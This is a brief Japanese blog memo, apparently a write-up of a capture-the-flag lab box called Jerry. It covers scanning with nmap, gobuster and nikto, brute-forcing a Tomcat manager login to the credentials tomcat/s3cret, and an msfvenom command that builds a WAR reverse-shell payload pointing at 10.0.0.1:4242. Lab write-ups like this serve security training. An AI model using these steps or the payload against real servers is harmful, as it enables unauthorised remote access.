ただのメモです

Writeupなら他のブログ見たほうがいいと思います.

Jerry writeup

まずnmapから

f:id:F-Ryu:20210618204145p:plain

httpサーバーのみ。次にgobuster、niktoで事前調査。

f:id:F-Ryu:20210618204251p:plain

f:id:F-Ryu:20210618204325p:plain

いくらか興味深いページが見られるがページにアクセスしてみる。

f:id:F-Ryu:20210618204358p:plain

どうやらターゲットはTomcatを使用しているようだ。事前調査で気になったページを見ていると/manager/htmlで認証を要求された。StartingPointと違って前のパスワード等はない。

f:id:F-Ryu:20210618204551p:plain

Tomcatについて調査しているとHackTrickのサイトにmetasploitのモジュールが載っていた。これを使用してみる。

auxiliary/scanner/http/tomcat_mgr_login

book.hacktricks.xyz

f:id:F-Ryu:20210618204756p:plain

tomcat/s3cret でログインできたページを探すとファイルをアップロードできる箇所がある。ここでリバースシェルをアップロードできるはずだ。下記サイトからtomcatに上げるWARファイルのリバースシェルのペイロードを探すと

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war

github.com

f:id:F-Ryu:20210618204836p:plain

f:id:F-Ryu:20210618205116p:plain

これをアップロードしてシェルのアドレスにアクセスするとリバースシェルが得られた。ちなみにアドレス自体はページに表示される。

f:id:F-Ryu:20210618205225p:plain

f:id:F-Ryu:20210618205234p:plain

f:id:F-Ryu:20210618205244p:plain

アクセスして権限を見てみると最初からrootだった。

f:id:F-Ryu:20210618205308p:plain